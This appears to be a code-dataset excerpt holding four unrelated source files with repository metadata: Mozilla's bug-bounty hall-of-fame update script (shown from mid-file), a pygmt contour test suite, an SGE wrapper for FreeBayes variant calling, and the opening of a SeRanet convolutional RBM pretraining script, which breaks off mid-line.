: "https://acrossecurity.com/", "6c5314d59c2e56564b18fe6199305fd3" : "https://www.facebook.com/Fatality04", "740b81a60bd25700b839f63e8d937796" : "http://linkedin.com/in/karthik-kumar-reddy-3b10b4128", "755ae0590425c02b3c203036df1a7e1e" : "http://www.securesoftware.nl", "77af16493363287bc9b6ed99548293d7" : "https://www.aryansinha.com/", "77b1dc2043055d86d9e81b5035efe29f" : "https://www.linkedin.com/in/sourc7/", "7aba285c7e4b7f41df3dae6f4becd2a9" : "https://bishopfox.com/", "7bd9d5640cb0f0dd5e59ccd7b02a0349" : "https://krashconsulting.com", "7e1e41ab0cd46a4a32c82def7b840a6d" : "http://cure53.de/", "7edb6115b239d771b9689857b9e95568" : "https://hboeck.de/", "80e0b8cb2a22f8b9669d2ca1968ce898" : "https://ewirch.github.io/", "817bd7bdff0d93ccdada8707b5278a08" : "https://axen-cyber.com", "8314603008777278fd70c0b9b4f01645" : "http://www.adambarth.com/", "9228cdb27944fb384f1305d2d0c350b8" : "https://facebook.com/tkrawool", "95663a4cc4fa467fdd949b16b6e03760" : "https://labs.f-secure.com/", "9684d8c1d955335cb2ba23ddab9769ac" : "http://www.kerneronsec.com/", "9b50ae1f239de9709af5f1db53629f8c" : "https://bughunter.withgoogle.com/profile/3c96630c-9112-4ddb-a029-df2bb893c6c3", "9d81009615f1e3b3b269eb78a4abd529" : "https://www.linshunghuang.com/", "9e6d48cc96c5931585cbe2bfc66246b8" : "https://haltp.org", "a63f14172a1a1763ebe352317a9c9156" : "https://hackerone.com/derision", "a71a35e2a42f69964a986531483ab405" : "https://jswrenn.com/", "abb98d52131c2c03f832122ea7f9308b" : "https://www.linkedin.com/in/ismailtasdelen/", "ac6cb3312f13091a2b1ab69bb496057d" : "https://robwu.nl", "b1a7d637734d5dad9b43136609c8f31f" : "https://www.zippenhop.com/", "b7b33547a73d2d2c7325f2c47406805f" : "https://rakeshmane.com/", "bc1ce7e8b84b814c2eaf2566e4787881" : "https://briansmith.org/", "bca639214bd2b582e62763ecc183babd" : "https://www.grepular.com/", "bf39fa273742eda0011a11c8e5369e4b" : "http://www.agarri.fr/", "c78082d6d5aae54b54f48cecc0f97bed" : "https://twitter.com/Ms2ger", "ca5c500dbd892f7c06f6a7323220b2b6" : "https://github.com/sczi", "d53d5650291b09956d8d8fdc488e1d5b" : "https://rawsec.net/", "d77e4bf715af2d76c9c3ae565a21d40f" : "https://www.ygitsoftware.com/", 
"da370b9a066b1f80464a33801840e392" : "http://ja.avtokyo.org/projects/sutegoma2", "db59cb01d7b08db1a46c7f7834ff21fa" : "https://www.iainnicol.com/", "ddc9459ee44cb5366ad418f992aa47a3" : "http://www.cybersensei.io", "de93fee584390b928b2d12bd3d198fc0" : "http://0days.engineer", "dfce8e4c8278c73ffa3ace9344e86572" : "https://antoine.delignat-lavaud.fr", "e064c5dd0686bd77a7bb7cc538547d8d" : "https://jbeekman.nl/", "e0a2ecaef5c7fa9bf90731771aac2e95" : "https://de.linkedin.com/in/marcschoenefeld", "e22e60864c27178d2469566dbcfb4e09" : "http://lcamtuf.coredump.cx/", "e2b442dbd6ddf0e28802b71bb4cf4376" : "https://bugzilla.mozilla.org/user_profile?user_id=342842", "e5d2322aa516d90b7eb9a84d7b890938" : "https://bjornweb.nl/", "f8266c7296c7f7d996e0040ad7843bf0" : "https://www.s3cur3.it/", } client_products = [ "Core", "External Software Affecting Firefox", "GeckoView", "Firefox", "Firefox for Android", "Firefox for iOS", "Mozilla VPN", "Fenix", "Focus", "Focus-iOS", "Lockwise", "MailNews Core", "NSPR", "NSS", "Pocket", "Thunderbird", "Toolkit", "WebExtensions", "DevTools", "Calendar", ] web_products = ["Cloud Services", "Data Platform and Tools", ] def is_client_bug(bug): # We have a limited number of for-certain web products # but for the most part we rely on !client if bug['product'] in web_products: return False if bug['product'] == "Testing" and bug['component'] == "geckodriver": return True # A lot of Pocket bugs are web bugs, but some are client if bug['product'] == "Pocket": return not bug['component'] == "getpocket.com" if bug['classification'] == "Client Software": if bug['product'] == "Emerging Markets" and bug['component'] in ["Security: Firefox Lite"]: return True if bug['product'] not in client_products: # this is an edge case we should validate and improve raise Exception("Classification: '{0}' Product: '{1}' Component: '{2}' is not considered a client bug, please confirm.".format(bug['classification'], bug['product'], bug['component'])) return bug['product'] in client_products # Set up the requests retry/backoff strategy retry_strategy = Retry( total=5, status_forcelist=[429, 500, 502, 503, 504], method_whitelist=["HEAD", "GET", "OPTIONS"], backoff_factor=2 ) adapter = HTTPAdapter(max_retries=retry_strategy) http = requests.Session() http.mount("https://", adapter) http.mount("http://", adapter) def main(): args = command_line() # Do this first so we error immediately if the file isn't there. with open(os.path.abspath(args.output), 'r') as f: file_data = f.read() f.close() hmackey = get_hmac_key(args.apikey) debuglogfilename = 'debuglog.' + str(int(time.time())) + '.log' debuglog = open(debuglogfilename, 'w') print("Okay, we're going to start. 
Have you assigned hof+ to the eligible bugs with bounty- and CVEs?") print("The link for those for you to review is:") print(" ", CVE_REVIEW.replace("YEAR_REPLACEME", args.year)) print("If you forgot to do this, kill the script, do it, and start it again.") print("I'm logging to", debuglogfilename) bugs = gather_bug_list(args.apikey) hof_entries = [] (begin_date, end_date) = define_dates(args.quarter, args.year) print("Generating Bug Data from " + str(len(bugs["bugs"])) + " bugs") num_processed = 0 for bug in bugs["bugs"]: bugid = str(bug["id"]) debuglog.write(bugid + ",") debuglog.write(bug['classification'] + ",") debuglog.write(bug['product'] + ",") debuglog.write(bug['component'] + ",") num_processed += 1 #if num_processed % 100 == 0: print("Processed", num_processed, "of", len(bugs["bugs"]), "currently on", bugid) if args.client and not is_client_bug(bug): debuglog.write("wrong product: " + bug['product'] + "\n") continue elif args.web and is_client_bug(bug): debuglog.write("wrong product: " + bug['product'] + "\n") continue data ={'bugid':bugid} # ========================================================================================== # Look for the bug bounty attachment first attachment_url = BASE_URL + 'bug/' + bugid + '/attachment' try: attachments = http.get(attachment_url, headers=HEADERS, params={'api_key' : args.apikey}).json()['bugs'][bugid] except Exception as e: print ("Error in " + bugid) print (e) continue # attachment_breakout[0] = email # attachment_breakout[1] = paid # attachment_breakout[2] = reported date # attachment_breakout[3] = fixed date # attachment_breakout[4] = awareded date # attachment_breakout[5] = publish (true/false) # attachment_breakout[6] = credit # attachment_breakout[7] = twitter # attachment_breakout[8] = url foundAttachment = None for attachment in attachments: if attachment['file_name'] == 'bugbounty.data' and attachment['is_private'] == 1: if foundAttachment and bugid not in ["913805"]: raise Exception("Two bug bounty attachments were found for " + bugid) foundAttachment = attachment if foundAttachment: # Old bugs with weird formats if bugid in ['1074642']: continue try: attachment = foundAttachment attachment_breakout = [x.strip() for x in attachment['description'].split(',')] data["email"] = attachment_breakout[0] data["email_hmac"] = hmac_email(hmackey, attachment_breakout[0]) data["date_raw"] = attachment_breakout[4] or attachment_breakout[3] or attachment_breakout[2] data["date"] = datetime.strptime(data["date_raw"], '%Y-%m-%d') debuglog.write("bounty+," + data["date_raw"] + "," + data["email"] + "," + data["email_hmac"] + ",") if begin_date < data["date"] < end_date: if "@mozilla.com" in data["email"] and mozilla_email_was_employed(data["email"], data["date"]): debuglog.write("Mozilla Employee in a Bug Bounty Attachment??\n") # Don't add Mozilla employees filing bugs under their work email to the HOF continue # print("Generating Data For Bug %s - %s" % (bugid, data["email"])) numFields = len(attachment_breakout) if not bool(attachment_breakout[5]): debuglog.write("Publish was blank,") elif "no" == attachment_breakout[5].lower() or "false" == attachment_breakout[5].lower(): debuglog.write("Do Not Publish\n") continue else: debuglog.write("publish,") data["name"] = "" if numFields > 6 and attachment_breakout[6]: data["name"] = attachment_breakout[6] if "[paid]" in data["name"]: data["name"] = "" elif "no response" in data["name"]: data["name"] = "" elif data["name"][0] == '"' and data["name"][-1] == '"': data["name"] = data["name"][1:-1] 
if data["name"] and data["email_hmac"] not in credit_entries and \ check_add_credit_to_script(data["email"], data["name"]): add_credit_to_script(hmackey, data["email"], data["name"]) if not data["name"] and data["email_hmac"] in credit_entries: data["name"] = credit_entries[data["email_hmac"]] elif not data["name"]: user_url = BASE_URL + 'user?names=' + data["email"] try: user_response = http.get(user_url, headers=HEADERS) user_response_data = user_response.json() except requests.exceptions.RequestException as e: print("Could not get user data for " + user_url) print(e) sys.exit(1) if user_response.status_code == 200 and user_response_data['users'][0]["real_name"]: data["name"] = user_response_data['users'][0]["real_name"] else: data["name"] = data["email"].split('@', 1)[0] print("Had to use fallback name for", bugid, data["email"], data["name"]) data["quarter-string"] = data["date_raw"][0:4] + month_to_quarter(data["date_raw"][5:7]) if data["email_hmac"] in twitter_entries: data["twitter"] = twitter_entries[data["email_hmac"]] elif numFields > 7 and attachment_breakout[7]: data["twitter"] = attachment_breakout[7] add_twitter_to_script(hmackey, data["email"], data["twitter"]) if data["email_hmac"] in url_entries: data["url"] = url_entries[data["email_hmac"]] elif numFields > 8 and attachment_breakout[8]: data["url"] = attachment_breakout[8] add_url_to_script(hmackey, data["email"], data["url"]) if not "url" in data and "twitter" in data: data["url"] = "https://twitter.com/" + data["twitter"] hof_entries.append(data) debuglog.write(data["name"] + "," + (data["url"] if 'url' in data else "") + "\n") continue # Go to next bug else: debuglog.write("Date wasn't in range\n") continue except: debuglog.write("Printed Exception\n") import traceback print("--------------------------------------------------------") print("Could not process %s" % bugid) print("Attachment field: %s" % attachment['description']) print("Split fields: %s" % attachment['description'].split(',')) print(traceback.format_exc()) print("--------------------------------------------------------") continue # ========================================================================================== # If we didn't find a bounty attachment, then it's a Hall of Fame Entry if 'cf_last_resolved' not in bug or not bug['cf_last_resolved']: # Unusual case data["date_raw"] = bug['creation_time'].split("T")[0] else: # Normal case data["date_raw"] = bug['cf_last_resolved'].split("T")[0] data["date"] = datetime.strptime(data["date_raw"], '%Y-%m-%d') debuglog.write("bounty-," + data["date_raw"] + ",") if begin_date < data["date"] < end_date: data["name"] = "" data["email"] = bug['creator_detail']['email'] data["email_hmac"] = hmac_email(hmackey, data["email"]) debuglog.write(data["email"] + "," + data["email_hmac"] + ",") if "@mozilla.com" in data["email"] and mozilla_email_was_employed(data["email"], data["date"]): debuglog.write("Mozilla Employee??\n") # Don't add Mozilla employees filing bugs under their work email to the HOF continue # print("Generating Data For Bug %s - %s" % (bugid, data["email"])) if data["email_hmac"] in credit_entries: data["name"] = credit_entries[data["email_hmac"]] else: user_url = BASE_URL + 'user?names=' + data["email"] try: user_response = http.get(user_url, headers=HEADERS) user_response_data = user_response.json() except requests.exceptions.RequestException as e: print("Could not get user data for " + user_url) print(e) sys.exit(1) if user_response.status_code == 200 and 
user_response_data['users'][0]["real_name"]: data["name"] = user_response_data['users'][0]["real_name"] else: data["name"] = data["email"].split('@', 1)[0] print("Had to use fallback name:", bugid, data["email"], data["name"]) data["quarter-string"] = data["date_raw"][0:4] + month_to_quarter(data["date_raw"][5:7]) if data["email_hmac"] in twitter_entries: data["twitter"] = twitter_entries[data["email_hmac"]] if data["email_hmac"] in url_entries: data["url"] = url_entries[data["email_hmac"]] if not "url" in data and "twitter" in data: data["url"] = "https://twitter.com/" + data["twitter"] hof_entries.append(data) debuglog.write(data["name"] + "," + (data["url"] if 'url' in data else "") + "\n") continue # Go to next bug (although we're already at the end of the loop.) else: debuglog.write("Date wasn't in range\n") continue def sortByDate(val): return val["date"] hof_entries.sort(key=sortByDate, reverse=True) oneEntryPerQuarter = set() hof_output = "" hof_bugzilla_queryarg = "" for data in hof_entries: try: hof_bugzilla_queryarg += data['bugid'] + "," thisData = data["name"] + " " + data["quarter-string"] if thisData in oneEntryPerQuarter: continue oneEntryPerQuarter.add(thisData) hof_output = hof_output + "- name: {}\n".format(data["name"]) hof_output = hof_output + " date: {}\n".format(data["date_raw"]) if "twitter" in data: hof_output = hof_output + " twitter: \"{}\"\n".format(data["twitter"]) if "url" in data: hof_output = hof_output + " url: {}\n".format(data["url"]) except Exception as e: print("Could not write hof entry for ", data["name"]) final_output = file_data[:6] +'\n' + hof_output.rstrip() + file_data[6:] with open(os.path.abspath(args.output), 'w') as output_file: output_file.write(final_output) print("I logged to", debuglogfilename) print("Here is a bugzilla query showing all the bugs I processed for this quarter. 
Please note that a reporter _may_ have multiple bugs, so don't remove them from the HOF for a misplaced bug without double checking.") print("https://bugzilla.mozilla.org/buglist.cgi?quicksearch={0}".format(hof_bugzilla_queryarg)) def define_dates(quarter, year): if quarter == "doitall": begin_date = datetime.strptime("{}-01-01" .format(2000), '%Y-%m-%d') end_date = datetime.strptime("{}-12-31" .format(2019), '%Y-%m-%d') elif int(quarter) == 1: begin_date = datetime.strptime("{}-01-01" .format(year), '%Y-%m-%d') end_date = datetime.strptime("{}-03-31" .format(year), '%Y-%m-%d') elif int(quarter) == 2: begin_date = datetime.strptime("{}-04-01" .format(year), '%Y-%m-%d') end_date = datetime.strptime("{}-06-30" .format(year), '%Y-%m-%d') elif int(quarter) == 3: begin_date = datetime.strptime("{}-07-01" .format(year), '%Y-%m-%d') end_date = datetime.strptime("{}-09-30" .format(year), '%Y-%m-%d') elif int(quarter) == 4: begin_date = datetime.strptime("{}-10-01" .format(year), '%Y-%m-%d') end_date = datetime.strptime("{}-12-31" .format(year), '%Y-%m-%d') else: print("not a valid quarter") sys.exit(1) return(begin_date, end_date) def month_to_quarter(month): if int(month) <= 3: return str(1) elif int(month) <= 6: return str(2) elif int(month) <= 9: return str(3) else: return str(4) def command_line(): parser = argparse.ArgumentParser() parser.add_argument("-a", "--apikey", help="Bugzilla API key") parser.add_argument("-f", "--output", help="YAML file") parser.add_argument("-y", "--year", help="year") parser.add_argument("-q", "--quarter", help="quarter as digit") parser.add_argument("-w", "--web", help="Process Web Bugs", action='store_true') parser.add_argument("-c", "--client", help="Process Client Bugs", action='store_true') parser.add_argument("--sort-credit-entries", help="Do not update Hall of Fame, just sort the credit entries and output them", action='store_true') parser.add_argument("--hmac", help="hmac an email address") args = parser.parse_args() if args.sort_credit_entries: print("credit_entries = {") for k in sorted(credit_entries): print(" \"" + k + "\" : \"" + credit_entries[k].replace("\"", "\\\"") + "\",") print("}") print("twitter_entries = {") for k in sorted(twitter_entries): print(" \"" + k + "\" : \"" + twitter_entries[k].replace("\"", "\\\"") + "\",") print("}") print("url_entries = {") for k in sorted(url_entries): print(" \"" + k + "\" : \"" + url_entries[k].replace("\"", "\\\"") + "\",") print("}") sys.exit(0) elif args.hmac and args.apikey: print(hmac_email(get_hmac_key(args.apikey), args.hmac)) sys.exit(0) elif args.hmac: print("If you request hmac you must also supply --apikey") sys.exit(1) else: if not args.apikey or not args.output or not args.year or not args.quarter: parser.print_help() sys.exit(1) if not args.client and not args.web: print("Either --web or --client is required.") sys.exit(1) return args def check_add_credit_to_script(email, credit): if " and " in credit: # Do not, by default, add double-credits as a mapping. return False if email == "replace@replace.com": # This was an old field used to indicate we were filing a bug for someone return False if "@mozilla.com" in email: # Do not add mozilla emails to script, we probably filed them for someone else. 
return False if credit.strip()[0] == "@": raise Exception("It looks like a Twitter handle is in the credit field.") return True def mozilla_email_was_employed(email, date): pre_employment_data = { 'jdemooij@mozilla.com' : datetime(year=2011, month=11, day=1), 'choller@mozilla.com' : datetime(year=2011, month=8, day=1) } if email not in pre_employment_data: return True return date > pre_employment_data[email] def hmac_email(hmackey, email): return hmac.new(hmackey, email.strip().lower().encode(), digestmod='md5').hexdigest() def add_credit_to_script(hmackey, email, credit): string_to_add = '"' + hmac_email(hmackey, email) + '":"' + credit + '",' with open(os.path.basename(__file__), 'r', encoding="utf-8") as in_script: script_data = in_script.read() index = script_data.find('credit_entries = {') + 18 final_output = script_data[:index] +'\n' + " " + string_to_add + script_data[index:] with open(os.path.basename(__file__), 'w', encoding="utf-8") as out_script: out_script.write(final_output) def add_twitter_to_script(hmackey, email, twitter): string_to_add = '"' + hmac_email(hmackey, email) + '":"' + twitter + '",' with open(os.path.basename(__file__), 'r', encoding="utf-8") as in_script: script_data = in_script.read() index = script_data.find('twitter_entries = {') + 19 final_output = script_data[:index] +'\n' + " " + string_to_add + script_data[index:] with open(os.path.basename(__file__), 'w', encoding="utf-8") as out_script: out_script.write(final_output) def add_url_to_script(hmackey, email, url): string_to_add = '"' + hmac_email(hmackey, email) + '":"' + url + '",' with open(os.path.basename(__file__), 'r', encoding="utf-8") as in_script: script_data = in_script.read() index = script_data.find('url_entries = {') + 15 final_output = script_data[:index] +'\n' + " " + string_to_add + script_data[index:] with open(os.path.basename(__file__), 'w', encoding="utf-8") as out_script: out_script.write(final_output) def gather_bug_list(apikey): try: bugs = http.get(search_url, headers=HEADERS, params={'api_key':apikey, 'include_fields': 'id, classification, product, component, cf_last_resolved, creator, creation_time'}).json() except requests.exceptions.RequestException as e: print(e) sys.exit(1) return bugs def get_hmac_key(apikey): key = "" try: response = http.get("https://bugzilla.mozilla.org/rest/bug/attachment/" + str(HMAC_KEY_ATTACHMENT_ID), headers=HEADERS, params={'api_key':apikey}).json() return base64.b64decode(response['attachments'][str(HMAC_KEY_ATTACHMENT_ID)]['data']) except requests.exceptions.RequestException as e: print(e) sys.exit(1) return key if __name__ == '__main__': main()
mozilla/foundation-security-advisories
update_hof.py
Python
mpl-2.0
46500
[ "Brian" ]
c2fe1fe65e5c110feca6bbde2e9bd4e049a1b507061e934fc53ab65df9194e68
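The update_hof.py record above never stores reporter email addresses in its public credit/twitter/url tables; every lookup is keyed on an HMAC of the normalized address. A minimal sketch of that pseudonymization pattern follows; the key below is a placeholder (the real script fetches its key from a private Bugzilla attachment) and the address is invented for illustration.

import hmac

def hmac_email(hmackey, email):
    # Lower-case and strip the address so every spelling maps to the same digest.
    return hmac.new(hmackey, email.strip().lower().encode(), digestmod='md5').hexdigest()

key = b'placeholder-key'  # assumption: stands in for the private HMAC key
credit = {hmac_email(key, 'reporter@example.org'): 'Example Reporter'}
assert credit[hmac_email(key, ' Reporter@Example.ORG ')] == 'Example Reporter'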
# pylint: disable=redefined-outer-name """ Tests contour. """ import os from itertools import product import numpy as np import pytest from pygmt import Figure from pygmt.exceptions import GMTInvalidInput TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), "data") POINTS_DATA = os.path.join(TEST_DATA_DIR, "points.txt") @pytest.fixture(scope="module") def data(): """ Load the point data from the test file. """ return np.loadtxt(POINTS_DATA) @pytest.fixture(scope="module") def region(): """ The data region. """ return [10, 70, -5, 10] def test_contour_fail_no_data(data): """ Should raise an exception if no data is given. """ # Contour should raise an exception if no or insufficient data # is given fig = Figure() # Test all combinations where at least one data variable # is not given: for variable in product([None, data[:, 0]], repeat=3): # Skip the one combination where all data variables are given: if not any(item is None for item in variable): continue with pytest.raises(GMTInvalidInput): fig.contour( x=variable[0], y=variable[1], z=variable[2], region=region, projection="X4i", color="red", frame="afg", pen="", ) # Should also fail if given too much data with pytest.raises(GMTInvalidInput): fig.contour( x=data[:, 0], y=data[:, 1], z=data[:, 2], data=data, region=region, projection="X10c", style="c0.2c", color="red", frame="afg", pen=True, ) @pytest.mark.mpl_image_compare def test_contour_vec(region): """ Plot an x-centered Gaussian kernel with a different y scale. """ fig = Figure() x, y = np.meshgrid( np.linspace(region[0], region[1]), np.linspace(region[2], region[3]) ) x = x.flatten() y = y.flatten() z = (x - 0.5 * (region[0] + region[1])) ** 2 + 4 * y ** 2 z = np.exp(-z / 10 ** 2 * np.log(2)) fig.contour(x=x, y=y, z=z, projection="X10c", region=region, frame="a", pen=True) return fig @pytest.mark.mpl_image_compare def test_contour_matrix(data, region): """ Plot the data matrix. """ fig = Figure() fig.contour(data=data, projection="X10c", region=region, frame="ag", pen=True) return fig @pytest.mark.mpl_image_compare def test_contour_from_file(region): """ Plot using the data file name instead of loaded data. """ fig = Figure() fig.contour( data=POINTS_DATA, projection="X10c", region=region, frame="af", pen="#ffcb87" ) return fig @pytest.mark.mpl_image_compare(filename="test_contour_vec.png") def test_contour_deprecate_columns_to_incols(region): """ Make sure that the old parameter "columns" is supported and it reports a warning. Modified from the test_contour_vec() test. """ fig = Figure() x, y = np.meshgrid( np.linspace(region[0], region[1]), np.linspace(region[2], region[3]) ) x = x.flatten() y = y.flatten() z = (x - 0.5 * (region[0] + region[1])) ** 2 + 4 * y ** 2 z = np.exp(-z / 10 ** 2 * np.log(2)) # generate dataframe # switch x and y from here onwards to simulate different column order data = np.array([y, x, z]).T with pytest.warns(expected_warning=FutureWarning) as record: fig.contour( data=data, projection="X10c", region=region, frame="a", pen=True, columns=[1, 0, 2], ) assert len(record) == 1 # check that only one warning was raised return fig
GenericMappingTools/gmt-python
pygmt/tests/test_contour.py
Python
bsd-3-clause
3,786
[ "Gaussian" ]
20fbff94d773ca97e3890934f4457c75723257d04beab2c3e4f08582819fd13d
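The pygmt contour tests above synthesize their own input: an x-centered Gaussian bump evaluated on a flattened meshgrid, with the y term weighted by 4 so the kernel is half as wide in y. This standalone sketch reproduces just the data-generation step with numpy (no pygmt needed); the region values are taken from the tests.

import numpy as np

region = [10, 70, -5, 10]
x, y = np.meshgrid(np.linspace(region[0], region[1]),
                   np.linspace(region[2], region[3]))
x, y = x.flatten(), y.flatten()
# Squared distance from the x midpoint; the 4*y**2 term compresses the y axis.
z = (x - 0.5 * (region[0] + region[1])) ** 2 + 4 * y ** 2
# exp(-d*ln2/10**2): the kernel falls to 0.5 where the squared distance is 100.
z = np.exp(-z / 10 ** 2 * np.log(2))
assert 0.0 <= z.min() and z.max() <= 1.0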
''' Created on 07/31/2014 @Ronak Shah ''' import argparse import sys import time import os.path import stat from subprocess import Popen import shlex import shutil from datetime import date def main(): parser = argparse.ArgumentParser(prog='Run_FreeBayes.py', description='Run FreeBayes for Long Indels & MNPs (32bp-350bp)', usage='%(prog)s [options]') parser.add_argument("-pId", "--patientId", action="store", dest="patientId", required=True, metavar='PatientID', help="Id of the Patient for which the bam files are to be realigned") parser.add_argument("-tbam", "--tumorBAM", action="store", dest="tbam", required=True, metavar='tbam', help="Full Path to tumor bam file") parser.add_argument("-nbam", "--normalBAM", action="store", dest="nbam", required=True, metavar='nbam', help="Full Path to normal bam file") parser.add_argument("-v", "--verbose", action="store_true", dest="verbose", default=True, help="make lots of noise [default]") parser.add_argument("-t", "--threads", action="store", dest="threads", required=True, metavar='1', help="Number of Threads to be used to run freebayes") parser.add_argument("-r", "--referenceFile", action="store", dest="ref", required=True, metavar='/somepath/Homo_Sapiens_hg19.fasta', help="Full Path to the reference file with the bwa index.") parser.add_argument("-floc", "--freebayes", action="store", dest="FREEBAYES", required=True, metavar='/somepath/bin/freebayes', help="Full Path to the freebayes executables.") parser.add_argument("-q", "--queue", action="store", dest="queue", required=False, metavar='all.q or clin.q', help="Name of the SGE queue") parser.add_argument("-o", "--outDir", action="store", dest="outdir", required=True, metavar='/somepath/output', help="Full Path to the output dir.") parser.add_argument("-of", "--outfile", action="store", dest="outfile", required=True, metavar='outputfilename', help="Output file name") parser.add_argument("-qsub", "--qsubPath", action="store", dest="qsub", required=True, metavar='/somepath/qsub', help="Full Path to the qsub executables of SGE.") parser.add_argument("-mapQ", "--mappingquality", action="store", dest="MAPQ", required=True, metavar='20', help="Mapping Quality Threshold") parser.add_argument("-baseQ", "--basequality", action="store", dest="BASEQ", required=True, metavar='20', help="BASE Quality Threshold") parser.add_argument("-mac", "--minimumAlternateCount", action="store", dest="MAC", required=True, metavar='2', help="Minimum Alternate Allele Count") parser.add_argument("-maf", "--minimumAlternateFrequency", action="store", dest="MAF", required=True, metavar='0.01', help="Minimum Alternate Allele Frequency") parser.add_argument("-lai", "--leftAlignIndels", action="store_true", dest="lai", default=False, help="Pass if you wish to left align indels") args = parser.parse_args() if(args.verbose): print "I have Started the run for Freebayes." #(wd)= ProcessArgs(args) #if(wd.__ne__("NULL")): RunFreebayes(args) if(args.verbose): print "I have finished the run for Freebayes." 
def ProcessArgs(args): if(args.verbose): print "I am currently processing the arguments.\n" SampleDirName = args.patientId staticDir = "FreeBayesAnalysis" AnalysisDir = os.path.join(args.outdir,staticDir) SampleAnalysisDir = os.path.join(AnalysisDir,SampleDirName) if os.path.isdir(AnalysisDir): if(args.verbose): print "Dir:", AnalysisDir, " exists thus we won't be making it\n" else: os.mkdir(AnalysisDir) if os.path.isdir(SampleAnalysisDir): if(args.verbose): print "Dir:", SampleAnalysisDir," exists and we won't run the analysis\n" #return("NULL") else: os.mkdir(SampleAnalysisDir) if(args.verbose): print "I am done processing the arguments.\n" return(SampleAnalysisDir) def RunFreebayes(args): myPid = os.getpid() day = date.today() today = day.isoformat() today = today.replace("-","") #myPid = str(myPid) if(args.verbose): print "I am running freebayes for ", args.patientId, " using SGE" #Setting Job for SGE cmd = args.FREEBAYES + " -b " + args.tbam + " -b " + args.nbam + " -f " + args.ref + " -v " + args.outfile + " -I " + " -X " + " -O " + " -m " + args.MAPQ + " -q " + args.BASEQ + " -F " + args.MAF + " -C " + args.MAC + " -J --genotype-qualities" #print "CMD==>",cmd,"\n" qsub_cmd = args.qsub + " -q " + args.queue + " -N " + "Freebayes_"+args.patientId+"_"+str(myPid) + " -o " + "Freebayes_"+ args.patientId+"_"+str(myPid)+".stdout" + " -e " + "Freebayes_"+args.patientId+"_"+str(myPid)+".stderr" + " -V -l h_vmem=6G,virtual_free=6G -pe smp " + args.threads + " -wd " + args.outdir + " -sync y " + " -b y " + cmd print "QSUB_CMD==>", qsub_cmd , "\n" qsub_args = shlex.split(qsub_cmd) proc = Popen(qsub_args) proc.wait() retcode = proc.returncode if(retcode == 0): if(args.verbose): print "I have finished running Freebayes for ", args.patientId, " using SGE" else: if(args.verbose): print "Freebayes is either still running or it errored out with return code", retcode,"\n" if __name__ == "__main__": start_time = time.time() main() end_time = time.time() print("Elapsed time was %g seconds" % (end_time - start_time))
rhshah/Exome-Pipeline
bin/Run_FreeBayes.py
Python
apache-2.0
5,474
[ "BWA" ]
986cc00a861e64de259e7d618ffc628598b7b1ffd7cb79811a94cb2e9a1ff97f
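Run_FreeBayes.py assembles one long qsub command string, tokenizes it with shlex.split so quoted arguments survive, and blocks on Popen.wait() (the job itself is made synchronous with SGE's -sync y flag). A reduced sketch of that submit-and-wait pattern; the command is a harmless placeholder rather than a real qsub/freebayes invocation, since neither tool is assumed to be installed.

import shlex
from subprocess import Popen

cmd = 'python -c "print(42)"'  # placeholder for the qsub ... -sync y -b y ... string
proc = Popen(shlex.split(cmd))  # shlex keeps the quoted -c argument as one token
proc.wait()
print('exit code:', proc.returncode)  # 0 means the child completed successfully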
from __future__ import print_function import sys import cv2 import os import numpy as np import cPickle as pickle import timeit import time from argparse import ArgumentParser try: import PIL.Image as Image except ImportError: import Image import chainer from chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils, Link, Chain, ChainList import chainer.functions as F import chainer.links as L from tools.prepare_data import load_data from tools.utils import tile_raster_images if __name__ == '__main__': """ Pre setup """ # Get params (Arguments) parser = ArgumentParser(description='SeRanet ConvolutionalRBM pre-training') parser.add_argument('--gpu', '-g', type=int, default=0, help='GPU ID (negative value indicates CPU)') parser.add_argument('--arch', '-a', default='seranet_v1', help='model selection (seranet_v1)') parser.add_argument('--level', '-l', type=int, default=1, help='Pretraining level') parser.add_argument('--batchsize', '-B', type=int, default=20, help='Learning minibatch size') parser.add_argument('--epoch', '-E', default=1000, type=int, help='Number of max epochs to learn') parser.add_argument('--color', '-c', default='rgb', help='training scheme for input/output color: (yonly, rgb)') parser.add_argument('--pcd', '-p', default=1, type=int, help='pcd_flag') parser.add_argument('--kcd', '-k', default=1, type=int, help='cd-k') #parser.add_argument('--real', '-r', default=0, type=int, # help='0: use binary unit (Bernoulli), 1: use real unit (Gaussian-Bernoulli)') lambda_w = 1.0 # weight decay p = 0.05 # sparsity rate lambda_s = 10.0 # sparsity args = parser.parse_args() n_epoch = args.epoch # #of training epoch batch_size = args.batchsize # size of minibatch visualize_test_img_number = 5 # #of images to visualize for checking training performance if args.gpu >= 0: cuda.check_cuda_available() xp = cuda.cupy if args.gpu >= 0 else np if args.color == 'yonly': inout_ch = 1 elif args.color == 'rgb': inout_ch = 3 else: raise ValueError('Invalid color training scheme') # Prepare model print('prepare model') if args.arch == 'seranet': import arch.seranet_split as model_arch model = model_arch.seranet_split(inout_ch=inout_ch) elif args.arch == 'seranet_v1': import arch.seranet_v1 as model_arch model = model_arch.seranet_v1_crbm(inout_ch=inout_ch, pretrain_level=args.level, k=args.kcd, pcd_flag=args.pcd, lambda_w=lambda_w, p=p, lambda_s=lambda_s) else: raise ValueError('Invalid architecture name') # Directory/File setting for training log arch_folder = model_arch.arch_folder # Directory/File setting for training log training_process_folder = os.path.join(arch_folder, args.color, 'pretraining_crbm_level' + str(args.level)) if args.level > 1: pretrained_model_path = os.path.join(arch_folder, args.color, 'pretraining_crbm_level' + str(args.level - 1), 'my.model') serializers.load_npz(pretrained_model_path, model) if not os.path.exists(training_process_folder): os.makedirs(training_process_folder) os.chdir(training_process_folder) train_log_file_name = 'train.log' train_log_file = open(os.path.join(training_process_folder, train_log_file_name), 'w') #total_image_padding = 14 #24 #18 #14 """ Load data """ print('loading data') datasets = load_data(mode=args.color) np_train_dataset, np_valid_dataset, np_test_dataset = datasets np_train_set_x, np_train_set_y = np_train_dataset np_valid_set_x, np_valid_set_y = np_valid_dataset np_test_set_x, np_test_set_y = np_test_dataset n_train = np_train_set_x.shape[0] n_valid = np_valid_set_x.shape[0] n_test = 
